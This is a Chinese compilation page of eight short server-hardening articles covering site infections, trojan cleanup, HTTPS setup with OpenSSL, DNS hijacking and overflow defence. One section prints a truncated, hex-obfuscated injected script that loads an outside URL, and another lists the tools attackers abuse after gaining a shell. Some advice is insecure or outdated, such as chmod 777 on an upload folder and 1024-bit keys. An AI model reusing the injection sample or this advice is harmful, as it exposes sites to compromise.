欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

浅谈服务器或网站被植入病毒代码的原因WEB安全

时间:2022-06-09 08:31:04 其他范文 收藏本文 下载本文

下面是小编为大家整理的浅谈服务器或网站被植入病毒代码的原因WEB安全,本文共8篇,以供大家参考借鉴!

浅谈服务器或网站被植入病毒代码的原因WEB安全

篇1:浅谈服务器或网站被植入病毒代码的原因WEB安全

一般来说,服务器或者网站被植入病毒代码有以下三种原因:

1、虚拟主机网站代码有问题,存在安全漏洞造成的,

如果服务器上大部分用户的网站都正常,只有少量用户网站被黑,那么就很可能是少量用户网站被黑的网站代码有问题,存在安全漏洞造成的。造成这个问题是没有办法解决,也不是服务商的责任。

大家都知道,“虚拟主机提供商”对自己的每个虚拟主机用户都分配了FSO文件操作的权限,他们通过您分配的合法权限,可以任意改动和上传的任何文件。如果用户没有保护好您分配给他们的合法权限,令 有机可乘,那么, 就可以利用合法权限对网站进行破坏了,但是大部分用户都认为这个 入侵不是他自己造成的,是服务商造成的,这实际上是冤枉了服务商,

例如,用户使用了一些不安全的程序(如“动网论坛”),这些程序的代码设计本身存在漏洞,很容易被 利用来上传网页木马, 可以操纵网页木马,利用合法权限来破坏您用户的数据和改动网页的文件,甚至导致网站完全打不开。这些手法是最常见的“客户的网站代码有问题,存在安全漏洞造成的”。

2、是服务器被入侵导致的。

当服务器上所有网站都被植入了病毒代码,并且可以在源文件的尾部或头部找到病毒代码文件,或者在IIS里面被植入了添加脚本,就标明是由于服务器被入侵导致的。

3、是服务器所在的机房中了ARP病毒导致的。

当服务器上所有网站都被植入了病毒代码,并且在源文件的尾部或头部无法找到病毒代码文件,就表明服务器所在的机房中了ARP病毒。这时需要联系我们来解决,一般情况下,机房会有大量服务器中毒,会有很多客户向机房反应,一般在半小时内机房就会处理的。

篇2:网站服务器一直被挂马的解决办法WEB安全

网站服务器总是被挂木马,网站的头部被注入了大量的js代码,弄了好久终于解决了,问题的根源是在配置lampp服务器的时候,为了简单方便,给网站根目录赋予了777权限,给了 可趁之机。解决问题的思路就是把权限配置合理。具体方法如下:

1.重新安装linux系统:后台选择32bit ubunt

2.下载xampp服务器: wget url

3.解压xampp: tar xvfz xampp-linux-1.7.3a.tar.gz -C /opt

备注:压缩文件用tar -zcvf ***.tar.gz 文件夹

4.启动服务器:/opt/lampp/lampp start

5.设置安全密码:/opt/lampp/lampp security

6.从其他服务器上拷贝备份文件:scp root@ip:文件位置/文件名 文件名(文件已经备份过)

7.恢复etc/extra/httpd-vhosts.conf,

8.修改extra/httpd.conf,最后一行加入httpd-vhosts.conf

9.修改数据库导入数据文件大小的限制:extra/php.ini

10.新建用户:adduser ×××

11.新建用户组:addgroup ×××

12.给已有的用户增加工作组 usermod -G groupname username

13.改变htdocs文件夹下网站所属用户 chown -R user file,以此用户名和密码来登录FTP,

14.改变网站中上传图片目录的权限为777:chmod -R 777 图片文件夹

篇3:网站建设如何提高服务器的安全性WEB安全

一、安全漏洞

1、在Web服务器上不允许他人访问的秘密文件、目录或重要数据。

2、利用远程用户向服务器发送信息时,特别是信用卡之类的东西时,中途遭到不法分子的非法拦截。

3、Web服务器本身存在的一些漏洞,使一些人能侵入到主机系统中,破坏一些重要的数据,甚至会造成系统瘫痪。

4、CGI安全方面的漏洞包括

(1)有意或无意在主机的系统中遗漏Bugs给非法 创造有利条件。

(2)用CGI脚本编写的程序当涉及到远程用户从浏览器中输入表格(Form),并进行检索(Searchindex),或form-mail之类在主机上直接操作命令时,或许会给Web主机系统造成危险。

5、还有一些简单的从网上下载的Web服务器,没有考虑到一些安全因素,不能用作商业应用。

因此,不管是配置服务器,还是在编写CGI程序时都要注意系统的安全性,

尽量堵住任何存在的漏洞,创造安全的环境。

二、提高系统的安全性和稳定性

Web服务器安全预防措施:

1、限制在Web服务器开设账户,定期删除一些断进程的用户。

2、对于在Web服务器上开设的账户,在口令长度及定期更改方面作出相关要求,防止被盗用。

3、尽量使用FTP、MAIL等服务器与之分开,去掉ftp,sendmail,tftp,NIS,NFS,finger,netstat等一些无关的应用。

4、在Web服务器上去掉一些绝对不用的解释器,即当在你的CGI的程序中没用到PERL时,就尽量把PERL从系统解释器中删除掉。

5、定期查看服务器中的日志logs文件,分析一切可疑的事件。在errorlog中出现rm,login,/bin/perl,/bin/sh等之类的记录时,你的服务器就很可能已经受到了一些非法用户的入侵。

6.设置好Web服务器上系统文件的权限和属性,对于可以让人访问的文档分配一个公用的组,并只分配只读的权利。把所有的HTML文件归属这个组,由Web管理员管理这个组。对于Web的配置文件仅对Web管理员有写的权利。

篇4:Windows系统服务器(网站)安全注意事项病毒防范

年未了,网络安全越发显得重要,最近攻击事件是越来越多了,对于站长来说有时简直就是个恶梦,

这里我针对自己做站的一些安全经验,跟大家一起分享,也许我说的你可能觉得太简单,但是我希望可能还有一些朋友正需要这些信息,能帮到一二个也对得起我写这篇文章了。

1、服务器限端口

安装好系统,先限用tcp/ip端口筛选功能,开放你需要的一些端口,其它的都不要开,仅开放80、21(20)、3389(远程管理)。

当然用自带的软件防火墙也可以。

2、打好所有的补丁

这点不解释了

3、装好杀毒软件(可选)

如果你是多人使用的话,建议还是装上的好,以防万一,如果你自己用,而且能保证上传的没有毒的话可以不装。

4、开启自动更新,但人工安装

这样你可以让它后台下载,安装时也可以选择性安装。

5、禁用一些脚本组件,至少也得改个名之类

6、禁用guest用户,更名administrator ,然后把密码设的复杂一些,包含一些特殊符,

7、禁用一些默认的服务,关于这点,网上有很多文章介绍,我就不细说了,需要的朋友网上找一下吧。

8、禁用cmd.exe,禁用net.exe (这样不充许命令装态添加用户了)

9、为web目录单独设权限

10、为每一个站点单独设一个用户,然后绑到web目录下面。

11、有上传功能的网站,把那个上传的目录,在iis里设为不可运行脚本,运行权限为无。

12、针对不需要写操作的那些网站目录,最好将目录写入权去掉,只读即可。

13、为了防止动态脚本被人恶意修改,也可以把脚本文件设为只读+可运行

14、如果装有mssql的话,要删除禁用那些危险的系统存储过程,这个网上有很多,找一下吧。

15、asp网站特别要防止sql注入。 尽可能的加入防注入代码。

16、ftp要管好,不要支持匿名访问,密码不要太简单了,最好改掉默认21端口号

17、如不需要,禁止1433,1434端口

18、经常查查日志,最好养成习惯。

19、尽量不要在服务器上装你不熟的软件

20、尽量不要在服务器上使用ie或其它浏览器上网

21、尽量不要在服务器上使用outlook或是其它邮件客户端

当然,希望大家的网站都能平安!

篇5:网站被 泛解析后的解决方法WEB安全

这几天博友看看GPS地图网跟我讲:哎,我的域名被泛解析了,域名后台加了一个**.oo 指向了一个IP,不知道是谁加上去的,如果不是用www.可能发现的早,因为我都是site:www.xx.com,没有去site:xx.com。如下图:

后来我搜下发现有很多这样的网站。

今天还是一个网友发现告诉我的,他说现在虽然我发现了,也停止了,但是他的权重会越来越高,就是说我的三级域名的权重会越来越高,数量越来越多,直到权重超过你的首页。

最近好多人加我,叫我出售泛解析,我都温婉的拒绝了,我也不知道这些人哪里来的,如果域名商的内部人员这么操作,这确实是一门生意。如果是域名商的话,这事就有的说了,如果是域名密码被知道了,只能认倒霉。其实一般都很少用到域名密码,都是直接登陆那注册的IDC网站,再去管理域名。

发现这个情况会就立刻删掉那域名解析,但问题还是有的,百度那边已经收录了,被泛解析后,直接就降权了,

今天给百度站长论坛提交了反馈不知道会不会处理。泛解析的域名是站长不能控制的,都是乱七八糟的字母。

域名商查的8份开始的,这是个另外一个网友的IDC通告,这倒好,IDC直接禁止了所有蜘蛛爬行。对我们站长来说影响也很大。

我:那你现在就是立刻停止解析域名和百度申诉了,其他的都没做?

答:没有做,其他的我也不知道要做什么了,改域名的管理密码就是了。

我:去和你的域名供应商联系一下,肯定是你的密码什么的泄露了。这样的情况,进入管理后台把里面的*解析删除,然后修改管理密码,如果还是被别人泛解析,那就该DNS服务器地址。

另外,如果网站域名被泛解析后,又被百度等搜索引擎收录了,就很麻烦了,如文中所讲先是去百度申诉,不过一般没戏。360提供了网页快照删除的申诉(地址),还不错。不过如果被百度标记为危险网站的话,可以考虑去知道创宇申诉。因为百度的是采用安全联盟的数据库。在站长工具网站被K申诉通道中,我记录了大部分的投诉通道。有兴趣的朋友可以去看看。

扩展阅读:泛解析是指将*.域名解析到同一IP。泛域名在实际使用中作用是非常广泛的,比如实现无限二级域名功能,提供免费的url转发,在IDC部门实现自动分配免费网址,在大型企业中实现网址分类管理等等,都发挥了巨大的作用。不过这一作用也会被他人所利用。如本文所讲。

篇6:Linux下Web服务器架构之网站安全解决方案WEB安全

HTTPS(全称:Hypertext Transfer Protocol over Secure Socket Layer),是以安全为目标的HTTP通道,简单讲是HTTP的安全版,即HTTP下加入SSL层,HTTPS的安全基础是SSL,因此加密的详细内容就需要SSL。 它是一个URI scheme(抽象标识符体系),句法类同http:体系。用于安全的HTTP数据传输。https:URL表明它使用了HTTP,但HTTPS存在不同于HTTP的默认端口及一个加密/身份验证层(在HTTP与TCP之间)。这个系统的最初研发由网景公司进行,提供了身份验证与加密通讯方法,现在它被广泛用于万维网上安全敏感的通讯,例如交易支付方面。

案例应用1:Web服务器架构之https

1. 企业实现要求:

某公司要求在公司内部自行搭建CA证书服务器,用于提高证书服务(在windows server 上实现);并且为公司内部的WWW服务器提供证书服务,提供正常服务。

2. 案例应用简化拓扑图:

3.案例实现步骤:

(1)在windows server2008上搭建CA证书服务器

(2)在web服务器上安装相应的软件

[root@www ~]# mkdir /mnt/cdrom

[root@www ~]# mount /dev/cdrom /mnt/cdrom/

[root@www ~]# cd /mnt/cdrom/Server/

[root@www Server]# rpm -ivh httpd-2.2.3-22.el5.i386.rpm

[root@www ~]# yum install -y mod_ssl

(3)配置web服务器的虚拟主机

#创建网页文件

[root@www www]# cat html/

--www

--xjzhujunjie

--/03/17

[root@www www]# cat tec/

--tec

--xjzhujunjie

--2012/03/17

[root@www www]# cat mkt/

--mkt

--xjzhujunjie

--2012/03/17

#编辑apache配置文件

[root@www ~]# vim /etc/httpd/conf/httpd.conf

134 Listen 80

973 NameVirtualHost 192.168.101.111:80

992

993  ServerAdmin master@junjie.com

994  DocumentRoot /var/www/html

995  ServerName www.junjie.com

996  ErrorLog logs/www-error_log

997  CustomLog logs/www-access_log common

998

999

1000  ServerAdmin master@junjie.com

1001  DocumentRoot /var/www/tec

1002  ServerName tec.junjie.com

1003  ErrorLog logs/tec-error_log

1004  CustomLog logs/tec-access_log common

1005

1006

1007  ServerAdmin master@junjie.com

1008  DocumentRoot /var/www/mkt

1009  ServerName mkt.junjie.com

1010  ErrorLog logs/mkt-error_log

1011  CustomLog logs/mkt-access_log common

1012

(4)重启web服务器,测试虚拟主机

[root@www ~]# service httpd restart     #重启apache服务

Win7客户端测试在C:WindowsSystem32driversetchosts添加:

192.168.101.250     www.junjie.com

192.168.101.250     tec.junjie.com

192.168.101.250     mkt.junjie.com

Win7客户端使用IE9浏览器测试结果如下(虚拟主机完成):

(5)为web服务器申请证书

[root@www httpd]# mkdir certs

[root@www httpd]# cd certs/

[root@www certs]# openssl genrsa 1024 >httpd.key

[root@www certs]# chmod 600 httpd.key

CN/HENAN/ZHENGZHOU/zzu/junjie/www.junjie.com/xjzhujunjie@hotmail.com///

在linux的web服务器上启动桌面环境,用于申请证书

在firefox浏览器中输入192.168.101.112/certsrv来申请证书

选择申请证书,即可进入申请证书页面,将刚才生成的请求文件填写在下面

可以看到,此时证书服务器已经向web服务器返回信息,提示正在审核中

此时进入windows server 2008证书服务器上,开始审核web服务器申请的证书,选择挂起的证书,即可看到web服务器提交的申请信息

选择信息时,右键,所有任务,颁发证书,为web服务器颁发证书;接下来便可以在颁发的证书中看到已经颁发的证书;

Linux的web服务器再次在firefox浏览器中输入192.168.101.112/certsrv,查看挂起的证书,并下载证书

刚下载的证书,默认保存在桌面,将其移动到/etc/httpd/certs/下。

(6)修改web服务器证书文件

[root@junjie ~]# cd /etc/httpd/conf.d/ssl.conf

112 SSLCertificateFile /etc/httpd/certs/httpd.cer

119 SSLCertificateKeyFile /etc/httpd/certs/httpd.key

128 SSLCertificateChainFile /etc/httpd/certs/cacert.p7b

[root@www ~]# service httpd restart     #重启apache服务

(7)win7客户端使用https安全访问网页

使用win7的IE9测试,输入安全网址www.junjie.com

,此时浏览器提示安全警告,提示此网站的安全证书有问题,并将警告信息显示出来,具体如下:

如若:用户强制继续访问,侧依然可以访问,但是浏览器地址栏中,已经变成红色报警信息,提示此网站不安全

说明:在此由于我没有使用IE9浏览器,没有解决证书问题,故又使用搜狗浏览器来解决证书错误问题!若,你可以帮助我解决请在本文留言,多谢了!

使用搜狗浏览器警报信息如下:

此时,选择查看证书-证书路径-查看安装根证书和web服务器证书

安装证书;

选择是继续安装证书,接着再查看就没有证书问题了,如下所示:

此时再win7下使用搜狗高速浏览器,Google Chrome 浏览器,Internet Explorer 9浏览器,都显示安全访问,如下所示:

***********************************************

案例应用1:Web服务器架构之https自签发

1.企业实现要求:

某公司要求在Linux上实现web服务器功能,并要求实现自签发证书(及要求:linux服务器即为web服务器又为证书服务器)

2.案例应用简化拓扑图:

3.案例实现步骤:

(1)在web服务器上安装相应的软件

[root@www ~]# mkdir /mnt/cdrom

[root@www ~]# mount /dev/cdrom /mnt/cdrom/

[root@www ~]# cd /mnt/cdrom/Server/

[root@www Server]# rpm -ivh httpd-2.2.3-22.el5.i386.rpm

[root@www ~]# yum install -y mod_ssl

(2)创建CA证书服务器的根证书文件

[root@www ~]# cd /etc/pki/

[root@www pki]# vim tls/openssl.cnf

45 dir      =/etc/pki/CA      # Where everything is kept

46 certs     = $dir/certs    # Where the issued certs are  kept

47 crl_dir    = $dir/crl       # Where the issued crl are ke  pt

48 database    = $dir/index.txt    # database index file.

51 new_certs_dir = $dir/newcerts    # default place for new certs

53 certificate  = $dir/cacert.pem   # The CA certificate

54 serial     = $dir/serial     # The current serial number

58 private_key  = $dir/private/cakey.pem# The private key

88 countryName      = optional

89 stateOrProvinceName  = optional

90 organizationName    = optional

[root@www pki]# cd /etc/pki/CA/

[root@www CA]# mkdir certs crl newcerts

[root@www CA]# touch index.txt serial

[root@www CA]# echo “01” >serial

[root@www CA]# openssl genrsa 1024 >private/cakey.pem

Generating RSA private key, 1024 bit long modulus

........................++++++

....++++++

e is 65537 (0x10001)

[root@www CA]# chmod 600 private/cakey.pem

[root@www CA]# openssl req -new -x509 -key private/cakey.pem -out cacert.pem -days 365

Country Name (2 letter code) [GB]:CN

State or Province Name (full name) [Berkshire]:HENAN

Locality Name (eg, city) [Newbury]:ZHENGZHOU

Organization Name (eg, company) [My Company Ltd]:zzu

Organizational Unit Name (eg, section) []:junjie

Common Name (eg, your name or your server's hostname) []:rootca.junjie.com

Email Address []:master@junjie.com

(3)为web服务器的签发证书

[root@www CA]# mkdir /etc/httpd/certs

[root@www CA]#cd /etc/httpd/certs

[root@www certs]# openssl genrsa 1024 >httpd.key

Generating RSA private key, 1024 bit long modulus

..............++++++

........++++++

e is 65537 (0x10001)

[root@www certs]# chmod 600 httpd.key

[root@www certs]# openssl req -new -key httpd.key -out httpd.csr

Country Name (2 letter code) [GB]:CN

State or Province Name (full name) [Berkshire]:HENAN

Locality Name (eg, city) [Newbury]:ZHENGZHOU

Organization Name (eg, company) [My Company Ltd]:zzu

Organizational Unit Name (eg, section) []:junjie

Common Name (eg, your name or your server's hostname) []:www.junjie.com

///

[root@www certs]# openssl ca -in httpd.csr -out httpd.crt

[root@www certs]# chmod 600 *

(4)为web服务器的签发证书

[root@www certs]# cd /etc/httpd/conf.d

[root@www conf.d]# vim ssl.conf

112 SSLCertificateFile /etc/httpd/certs/httpd.crt

119 SSLCertificateKeyFile /etc/httpd/certs/httpd.key

128 SSLCertificateChainFile /etc/pki/CA/cacert.pem

(5)win7客户端使用https安全访问网页

[root@www ~]# service httpd restart     #重启apache服务

Win7客户端测试在C:WindowsSystem32driversetchosts添加:

192.168.101.250     www.junjie.com

使用win7的IE9测试,输入安全网址www.junjie.com

,此时浏览器提示安全警告,提示此网站的安全证书有问题,并将警告信息显示出来,具体如下:

如若:用户强制继续访问,侧依然可以访问,但是浏览器地址栏中,已经变成红色报警信息,提示此网站不安全

说明:在此由于我没有使用IE9浏览器,没有解决证书问题,故又使用搜狗浏览器来解决证书错误问题!若,你可以帮助我解决请在本文留言,多谢了!

使用搜狗解决问题方案如下:

此时,选择查看证书-证书路径-查看安装根证书和web服务器证书

安装证书;

选择是继续安装证书,接着再查看就没有证书问题了,如下所示:

此时再win7下使用搜狗高速浏览器,Internet Explorer 9浏览器,都显示安全访问,如下所示:

查看证书信息:

篇7:如何清理网站被arp病毒插入js恶意代码?服务器教程

网页 入如下的arp病毒的js恶意代码

script.>document.writeln("x3Cx73x63x72x69x70x74x20x73x72x63x3Dx68x74x74x70x3Ax2Fx2Fx4Fx25x36x36x25x36x36x25x34x39x25x36x33x65x25x32x45x25x34x36x25x34x31x51...

首先确定你的服务器上原文件  是否有这些代码

就是说 服务器上文件是没有的  但客户端一运行  在客户端看源代码就有了

这样的话  服务器确实中了arp了  只需要在服务器上装一个简单的arp防火墙即可  360  金山的就行 重启服务器  立刻没有了

如果你服务器上的源文件都被修改了  那是你的程序 或 服务器本身有安全漏洞,

如何清理网站被arp病毒插入js恶意代码?服务器教程

把你的源码拿回来看下有没有被修改

如果有就是你的程序问题

如果没有就可能是arp了.

篇8:降低服务器被溢出的可能性的安全技巧WEB安全

溢出是程序设计者设计时的不足所带来的错误,溢出也是是操作系统、应用软件永远的痛,在骇客频频攻击、系统漏洞层出不穷的今天,任何人都不能保证操作系统系统、应用程序不被溢出。既然溢出是必然的,并且利用溢出攻击的门槛又较低,有一定电脑基础的人都可以利用工具完成一次溢出。这样看来,电脑系统就处于随时被溢出的危险中,特别是肩负重任的服务器如果被溢出被渗透的话那后果不堪设想。我们总不能坐以待毙,做为网络管理人员,应该未雨绸廖做好防范工作,把服务器被溢出的可能性降到最低。

一 什么是溢出:

溢出是 利用操作系统的漏洞,专门开发了一种程序,加相应的参数运行后,就可以得到你电脑具有管理员资格的控制权,你在你自己电脑上能够运行的东西他可以全部做到,等于你的电脑就是他的了。

二 服务器溢出该如何防:

1、必须打齐补丁:

尽最大的可能性将系统的漏洞补丁都打完;MicrosoftWindowsServer系列的服务器系统可以将自动更新服务打开,然后让服务器在指定的某个时间段内自动连接到Microsoft Update网站进行补丁的更新。如果服务器为了安全起见禁止了对公网外部的连接的话,可以用Microsoft WSUS服务在内网进行升级。

2、服务最小化:

最少的服务等于最大的安全,停掉一切不需要的系统服务以及应用程序,最大限度地降底服务器的被攻击系数。比如前阵子的NDS溢出,就导致很多服务器挂掉了。其实如果WEB类服务器根本没有用到DNS服务时,大可以把DNS服务停掉,这样DNS溢出就对你们的服务器不构成任何威胁了。

3、端口过滤:

启动TCP/IP端口的过滤,仅打开服务器常用的TCP如21、80、25、110、3389等端口;如果安全要求级别高一点可以将UDP端口关闭,当然如果这样之后缺陷就是如在服务器上连外部就不方便连接了,这里建议大家用IPSec来封UDP。在协议筛选中只允许TCP协议、UDP协议 以及RDP协议等必需用协议即可;其它无用均不开放。

4、系统防火墙:

启用IPSec策略,为服务器的连接进行安全认证,给服务器加上双保险。封掉一些危险的端口,诸如:135 145 139 445 以及UDP对外连接之类、以及对通读进行加密与只与有信任关系的IP或者网络进行通讯等等。通过IPSec禁止UDP或者不常用TCP端口的对外访问就可以非常有效地防反弹类木马。

5、系统命令防御:

删除、移动、更名或者用访问控制表列Access Control Lists (ACLs)控制关键系统文件、命令及

文件夹:

(1)、 通常在溢出得到shell后,来用诸如net.exe、net1.exe、ipconfig.exe、user.exe、query.exe、 regedit.exe、regsvr32.exe 来达到进一步控制服务器的目的。如:加账号、克隆管理员了等等。我们可以将这些命令程序删除或者改名。 4 t( B+ L/ O- y.

提示:在删除与改名时先停掉文件复制服务 (FRS)或者先将 %windir%system32dllcache下的对应文件删除或改名。我爱电脑技术社区--打造最好的电

(2)、也或者将这些.exe文件移动到你指定的文件夹,这样也方便以后管理员自己使用,

(3)、访问控制表列ACLS控制:

找到%windir%system32下找到cmd.exe、cmd32.exe、net.exe、net1.exe、ipconfig.exe、tftp.exe、ftp.exe、user.exe、reg.exe、regedit.exe、regedt32.exe、regsvr32.exe这些 常用的文件,在“属性”→“安全”中对他们进行访问的ACLs用户进行定义,诸如只给administrator有权访问,如果需要防范一些溢出攻击、以及溢出成功后对这些文件的非法利用;那么我们只需要将system用户在ACLs中进行拒绝访问即可。

(4)、如果你觉得在GUI下面太麻烦的话,你也可以用系统命令的CACLS.EXE来对这些.exe文件的Acls进行编辑与修改,或者说将他写成一个.bat批处理文件来执行以及对这些命令进行修改。

(5)、对磁盘如C、D、E、F等进行安全的ACLS设置从整体安全上考虑的话也是很有必要的,另外特别要对Windows、WinntSystem、Document and Setting等文件夹。

6、组策略配置:

想禁用“cmd.exe”,执行“开始→运行”输入gpedit.msc打开组策略,选择“用户配置→管理模板→系统”,把“阻止访问命令提示符”设为“启用”。同样的可以通过组策略禁止其它比较危险的应用程序。

7、服务降级:

对一些以System权限运行的系统服务进行降级处理。比如:将Serv-U、Imail、IIS、Php、Mssql、Mysql等一系列以 System权限运行的服务或者应用程序换成其它administrators成员甚至users权限运行,这样就会安全得多了。但前提是需要对这些基本运行状态、调用API等相关情况较为了解。

小结:其实,关于防止如Overflow溢出类攻击的办法除了用上述的几点以外,还有很多种办法:比如通过注册表进行建立相应的键值,进行设置;写防护过滤程序用DLL方式加载windows到相关的SHell以及动态链接程序之中这类。当然自己写代码来进行验证加密就需要有相关深厚的Win32编程基础了,以及对Shellcode较有研究。

三 如何防止溢出获取Shell后对系统的进一步入侵

1、 在做好1中上述的工作之后,基本上可以防目骇客在溢出之后得到shell了;因为即使Overflow溢出成功,但在调用CMDSHELL、以及对外联接时就卡了。 (为什么呢,因为:1.溢出后程序无法再调用到CMDSHLL已经禁止system访问CMD.exe了。2.溢出之后在进行反弹时已经无法对外部IP进行连接了。所以,基本上要能过system权限来反弹shell就较困难的了...)

2、 当然世界上是不存在绝对的安全的,假设入侵者在得到了用户的shell之后,做些什么呢?一般入侵者在在得到shell之后,就会诸如利用系统命令加账号了 通过tftp、ftp、vbs等方式传文件了等等来达到进一步控制服务器。这里通过1上述的办法对命令进行了限制,入侵者是没有办法通过tftp、ftp来传文件了,但他们仍然可以能过echo写批处理,用批处理通过脚本BAT/VBS/VBA等从WEB上下载文件,以及修改其它盘类的文件等潜在破坏行为。所以用户需要 将echo命令也限制以及将其它盘的System写、修改文件的权限进行处理。以及将VBS/VBA类脚本以及XMLhttp等组件进行禁用或者限制system的运行权。这样的话别人得到Shell也无法对服务器上的文件进行删除以及进行步的控制系统了;以及本地提权反弹Shell了。

服务器的安全是个系统工程,任何小小的疏忽都有可以造成服务器的沦陷。“防”永远比“补”好,管理员“防”在溢出之前,把被攻击的危险降到最低,这才是真正的服务器安全之道。

服务器隐藏自己的方法网站安全

限制目录的文件执行权限保障服务器安全WEB安全

WLM如何防范被广告账号添加WEB安全

《浅谈服务器或网站被植入病毒代码的原因WEB安全(集锦8篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

最新推荐
猜你喜欢
点击下载本文文档